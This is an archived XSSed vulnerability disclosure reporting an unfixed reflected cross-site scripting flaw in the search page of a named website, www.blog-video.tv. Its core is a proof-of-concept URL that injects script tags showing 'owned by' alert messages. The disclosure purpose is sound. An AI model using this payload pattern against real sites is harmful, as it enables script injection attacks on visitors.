Unfixed XSS vulnerability at www.blog-video.tv

2009-12-08T00:00:00
ID XSSED:63378
Type xssed
Reporter ZenixXx
Modified 2010-04-07T00:00:00

Description

Security researcher ZenixXx submitted a cross-site scripting (XSS) vulnerability affecting www.blog-video.tv on 12/08/2009. At the time of submission, the site ranked 101608 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.blog-video.tv/recherche.php?recherche=%3CSCRIPT%3Ealert(String.fromCharCode(72%2C73%2C))%3C%2FSCRIPT%3E%0A%3CSCRIPT%3Ealert(String.fromCharCode(89%2C79%2C85))%3C%2FSCRIPT%3E%0A%3CSCRIPT%3Ealert(String.fromCharCode(65%2C82%2C69))%3C%2FSCRIPT%3E%0A%3CSCRIPT%3Ealert(String.fromCharCode(79%2C87%2C78%2C69%2C68))%3C%2FSCRIPT%3E%0A%3CSCRIPT%3Ealert(String.fromCharCode(66%2C89))%3C%2FSCRIPT%3E%0A%3CSCRIPT%3Ealert(String.fromCharCode(90%2C69%2C78%2C73%2C88%2C120%2C88))%3C%2FSCRIPT%3E